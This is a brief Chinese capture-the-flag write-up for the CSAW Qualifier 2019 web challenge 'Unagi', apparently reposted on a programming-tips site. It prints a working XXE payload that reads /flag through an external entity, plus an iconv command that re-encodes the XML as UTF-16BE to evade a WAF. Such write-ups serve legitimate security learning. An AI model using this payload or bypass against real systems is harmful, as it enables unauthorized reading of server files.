[CSAWQual 2019]Web_Unagi

本文主要是介绍[CSAWQual 2019]Web_Unagi，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

知识点：xxe外部实体注入和绕过waf

告诉我们要传一个xml文件，并且相应的样式信息也出来了。

flag在/flag下

构造xml

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users><user><username>gg</username><password>passwd1</password><name>ggg</name><email>alice@fakesite.com</email>  <group>CSAW2019</group><intro>&xxe;</intro></user><user><username>bob</username><password>passwd2</password><name> Bob</name><email>bob@fakesite.com</email>  <group>CSAW2019</group><intro>&xxe;</intro></user>
</users>

但是这边会被waf拦下，我们可以以其他编码方式来编码它。
（注意：这边不是字符串转其他编码，以其他编码格式来编码）
绕过方式

命令：

cat 1.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml

然后上传xml文件就可以了。

参考：
wp:
https://www.shawroot.cc/156.html

文献:
绕过WAF保护的XXE : https://xz.aliyun.com/t/4059

这篇关于[CSAWQual 2019]Web_Unagi的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---